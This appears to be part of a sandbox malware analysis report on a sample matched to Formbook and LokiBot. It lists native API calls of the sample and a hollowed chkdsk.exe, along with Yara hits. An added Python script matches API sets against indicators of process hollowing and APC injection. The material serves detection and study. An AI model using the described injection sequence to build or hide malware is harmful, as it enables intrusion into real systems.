Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9730 NtQueryVirtualMemory, 18_2_1E3F9730
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA710 NtOpenProcessToken, 18_2_1E3FA710
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9B00 NtSetValueKey, 18_2_1E3F9B00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9770 NtSetInformationFile, 18_2_1E3F9770
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA770 NtOpenThread, 18_2_1E3FA770
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9760 NtOpenProcess, 18_2_1E3F9760
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA3B0 NtGetContextThread, 18_2_1E3FA3B0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9FE0 NtCreateMutant, 18_2_1E3F9FE0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9820 NtEnumerateKey, 18_2_1E3F9820
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FB040 NtSuspendThread, 18_2_1E3FB040
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F98A0 NtWriteVirtualMemory, 18_2_1E3F98A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FAD30 NtSetContextThread, 18_2_1E3FAD30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9520 NtWaitForSingleObject, 18_2_1E3F9520
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9560 NtWriteFile, 18_2_1E3F9560
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9950 NtQueueApcThread, 18_2_1E3F9950
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F95F0 NtQueryInformationFile, 18_2_1E3F95F0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99D0 NtCreateProcessEx, 18_2_1E3F99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9540 NtReadFile,LdrInitializeThunk, 31_2_054A9540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A95D0 NtClose,LdrInitializeThunk, 31_2_054A95D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9710 NtQueryInformationToken,LdrInitializeThunk, 31_2_054A9710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9FE0 NtCreateMutant,LdrInitializeThunk, 31_2_054A9FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9780 NtMapViewOfSection,LdrInitializeThunk, 31_2_054A9780
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9650 NtQueryValueKey,LdrInitializeThunk, 31_2_054A9650
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 31_2_054A9660
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A96D0 NtCreateKey,LdrInitializeThunk, 31_2_054A96D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 31_2_054A96E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 31_2_054A9910
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A99A0 NtCreateSection,LdrInitializeThunk, 31_2_054A99A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9840 NtDelayExecution,LdrInitializeThunk, 31_2_054A9840
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9860 NtQuerySystemInformation,LdrInitializeThunk, 31_2_054A9860
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A50 NtCreateFile,LdrInitializeThunk, 31_2_054A9A50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9560 NtWriteFile, 31_2_054A9560
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9520 NtWaitForSingleObject, 31_2_054A9520
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AAD30 NtSetContextThread, 31_2_054AAD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A95F0 NtQueryInformationFile, 31_2_054A95F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9760 NtOpenProcess, 31_2_054A9760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA770 NtOpenThread, 31_2_054AA770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9770 NtSetInformationFile, 31_2_054A9770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA710 NtOpenProcessToken, 31_2_054AA710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9730 NtQueryVirtualMemory, 31_2_054A9730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A97A0 NtUnmapViewOfSection, 31_2_054A97A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9670 NtQueryInformationProcess, 31_2_054A9670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9610 NtEnumerateValueKey, 31_2_054A9610
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9950 NtQueueApcThread, 31_2_054A9950
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A99D0 NtCreateProcessEx, 31_2_054A99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AB040 NtSuspendThread, 31_2_054AB040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9820 NtEnumerateKey, 31_2_054A9820
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A98F0 NtReadVirtualMemory, 31_2_054A98F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A98A0 NtWriteVirtualMemory, 31_2_054A98A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9B00 NtSetValueKey, 31_2_054A9B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA3B0 NtGetContextThread, 31_2_054AA3B0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A00 NtProtectVirtualMemory, 31_2_054A9A00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A10 NtQuerySection, 31_2_054A9A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A20 NtResumeThread, 31_2_054A9A20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A80 NtOpenDirectoryObject, 31_2_054A9A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39D50 NtCreateFile, 31_2_00C39D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E80 NtClose, 31_2_00C39E80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E00 NtReadFile, 31_2_00C39E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39F30 NtAllocateVirtualMemory, 31_2_00C39F30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39DA9 NtReadFile, 31_2_00C39DA9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E7A NtClose, 31_2_00C39E7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39F2D NtAllocateVirtualMemory, 31_2_00C39F2D
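The native calls listed above for process 18 (the re-launched F63V4i8eZU.exe) and process 31 (chkdsk.exe) are the raw material behind the report's "Sample uses process hollowing technique", "Maps a DLL or memory area into another process" and "Queues an APC in another process" verdicts: NtUnmapViewOfSection, NtWriteVirtualMemory and NtSetContextThread for hollowing, NtCreateSection plus NtMapViewOfSection for section mapping, NtQueueApcThread for APC injection. The leading number of each function ID is the report's own per-process index (the same 0x12 = 18 and 0x1F = 31 lead the memory dump names further down), not a Windows PID. The Python below is an added example, not Joe Sandbox's code: it parses lines of exactly this shape, collects the native-API set per process index and matches it against indicator sets chosen for this example (the sandbox's own rule logic is not shown on this page). The embedded lines are copied from the report above.

```python
import re

# One "Code function" line of the report:
#   Source: <image> Code function: <idx>_<run>_<addr> <api>,<api>, <idx>_<run>_<addr>
# <idx> is the report's per-process index (0 = first F63V4i8eZU.exe, 18 = its re-launched
# copy, 31 = chkdsk.exe); the API list may be empty.
LINE_RE = re.compile(
    r"^Source:\s+(?P<image>.+?)\s+Code function:\s+"
    r"(?P<idx>\d+)_\d+_[0-9A-Fa-f]+\s+"
    r"(?P<apis>(?:\w+,)*)\s*"
    r"\d+_\d+_[0-9A-Fa-f]+\s*$"
)

# Indicator sets chosen for this example (assumption, not the sandbox's rules).
# required: every call must be present in the process; supporting: listed when present.
TECHNIQUES = {
    "process_hollowing": (
        {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread"},
        {"NtCreateProcessEx", "NtAllocateVirtualMemory", "NtGetContextThread", "NtResumeThread"},
    ),
    "section_mapping": (
        {"NtCreateSection", "NtMapViewOfSection"},
        {"NtOpenProcess", "NtUnmapViewOfSection"},
    ),
    "apc_injection": (
        {"NtQueueApcThread"},
        {"NtOpenThread", "NtSuspendThread", "NtResumeThread"},
    ),
}

# A subset of the report's lines, plus one heading line to show that non-function lines are skipped.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_1E3F97A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk, 18_2_1E3F9780
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk, 18_2_1E3F99A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA3B0 NtGetContextThread, 18_2_1E3FA3B0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F98A0 NtWriteVirtualMemory, 18_2_1E3F98A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FAD30 NtSetContextThread, 18_2_1E3FAD30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9950 NtQueueApcThread, 18_2_1E3F9950
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99D0 NtCreateProcessEx, 18_2_1E3F99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 31_2_054A9660
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AAD30 NtSetContextThread, 31_2_054AAD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A97A0 NtUnmapViewOfSection, 31_2_054A97A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A98A0 NtWriteVirtualMemory, 31_2_054A98A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A20 NtResumeThread, 31_2_054A9A20
Detected potential crypto function
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5359 0_2_022A5359
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5852
""".strip().splitlines()


def parse_report(lines):
    """Group Code function lines by process index: {idx: {"image", "functions", "apis"}}."""
    procs = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # headings, Yara hits and other non-function lines
        entry = procs.setdefault(
            int(m.group("idx")), {"image": m.group("image"), "functions": 0, "apis": set()}
        )
        entry["functions"] += 1
        entry["apis"].update(a for a in m.group("apis").split(",") if a)
    return procs


def injection_profile(apis):
    """Return {technique: sorted indicator APIs seen} for every technique whose required set is complete."""
    return {
        name: sorted((required | supporting) & apis)
        for name, (required, supporting) in TECHNIQUES.items()
        if required <= apis
    }


def summarize(lines):
    """Per process index: image, count of functions with native calls, and matched techniques."""
    return {
        idx: {"image": p["image"], "functions": p["functions"], "techniques": injection_profile(p["apis"])}
        for idx, p in parse_report(lines).items()
    }


if __name__ == "__main__":
    for idx, info in sorted(summarize(SAMPLE_LINES).items()):
        print(idx, info["image"], info["functions"], "functions")
        for tech, seen in info["techniques"].items():
            print("   ", tech, "->", ", ".join(seen))
```

On the sample, process 0 (the GuLoader stage) shows only NtWriteVirtualMemory among the injection APIs and matches nothing, process 18 matches all three sets, and process 31 completes the hollowing sequence with NtResumeThread. The required sets are intentionally small so that a process is not missed because the analyzer did not resolve one call; tune them against your own corpus.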
Detected potential crypto function
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5359 0_2_022A5359
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A55EC 0_2_022A55EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8254 0_2_022A8254
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A84 0_2_022A5A84
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AFD 0_2_022A2AFD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AD6 0_2_022A2AD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A22D5 0_2_022A22D5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B2B 0_2_022A0B2B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B73 0_2_022A0B73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B9B 0_2_022A0B9B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33EC 0_2_022A33EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A103C 0_2_022A103C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A781E 0_2_022A781E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A78B2 0_2_022A78B2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A48E8 0_2_022A48E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3920 0_2_022A3920
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8138 0_2_022A8138
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A09A8 0_2_022A09A8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A19CC 0_2_022A19CC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2E2F 0_2_022A2E2F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0618 0_2_022A0618
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8E7C 0_2_022A8E7C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A968F 0_2_022A968F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8ED8 0_2_022A8ED8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8F40 0_2_022A8F40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7FF5 0_2_022A7FF5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2C5C 0_2_022A2C5C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A84A6 0_2_022A84A6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A348A 0_2_022A348A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 0_2_022A7488
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A34EA 0_2_022A34EA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A84E9 0_2_022A84E9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3568 0_2_022A3568
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0D50 0_2_022A0D50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2DA0 0_2_022A2DA0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A35B0 0_2_022A35B0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0584 0_2_022A0584
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A25D4 0_2_022A25D4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D6E30 18_2_1E3D6E30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482EF7 18_2_1E482EF7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4822AE 18_2_1E4822AE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482B28 18_2_1E482B28
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EEBB0 18_2_1E3EEBB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47DBD2 18_2_1E47DBD2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481FF1 18_2_1E481FF1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47D466 18_2_1E47D466
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C841F 18_2_1E3C841F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471002 18_2_1E471002
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4828EC 18_2_1E4828EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB090 18_2_1E3CB090
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4820A8 18_2_1E4820A8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B0D20 18_2_1E3B0D20
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481D55 18_2_1E481D55
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BF900 18_2_1E3BF900
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482D07 18_2_1E482D07
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4825DD 18_2_1E4825DD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CD5E0 18_2_1E3CD5E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_0056968F 18_2_0056968F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531D55 31_2_05531D55
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532D07 31_2_05532D07
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05460D20 31_2_05460D20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055325DD 31_2_055325DD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552D466 31_2_0552D466
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547841F 31_2_0547841F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553DFCE 31_2_0553DFCE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531FF1 31_2_05531FF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552D616 31_2_0552D616
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05486E30 31_2_05486E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532EF7 31_2_05532EF7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546F900 31_2_0546F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521002 31_2_05521002
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553E824 31_2_0553E824
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055328EC 31_2_055328EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B090 31_2_0547B090
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055320A8 31_2_055320A8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AB40 31_2_0548AB40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532B28 31_2_05532B28
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552DBD2 31_2_0552DBD2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055203DA 31_2_055203DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549EBB0 31_2_0549EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FA2B 31_2_0551FA2B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055322AE 31_2_055322AE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3D069 31_2_00C3D069
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C21030 31_2_00C21030
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3DA97 31_2_00C3DA97
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22D8D 31_2_00C22D8D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22D90 31_2_00C22D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C29E2B 31_2_00C29E2B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C29E30 31_2_00C29E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22FB0 31_2_00C22FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3DF79 31_2_00C3DF79
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0546B150 appears 69 times
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: String function: 1E3BB150 appears 35 times
PE / OLE file has an invalid certificate
Source: F63V4i8eZU.exe Static PE information: invalid certificate
PE file contains strange resources
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: F63V4i8eZU.exe, 00000000.00000002.316213281.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.481559175.000000001E63F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.476842708.00000000023E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.476803523.0000000000AF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000000.315529096.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.475313264.00000000000D6000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Uses 32bit PE files
Source: F63V4i8eZU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
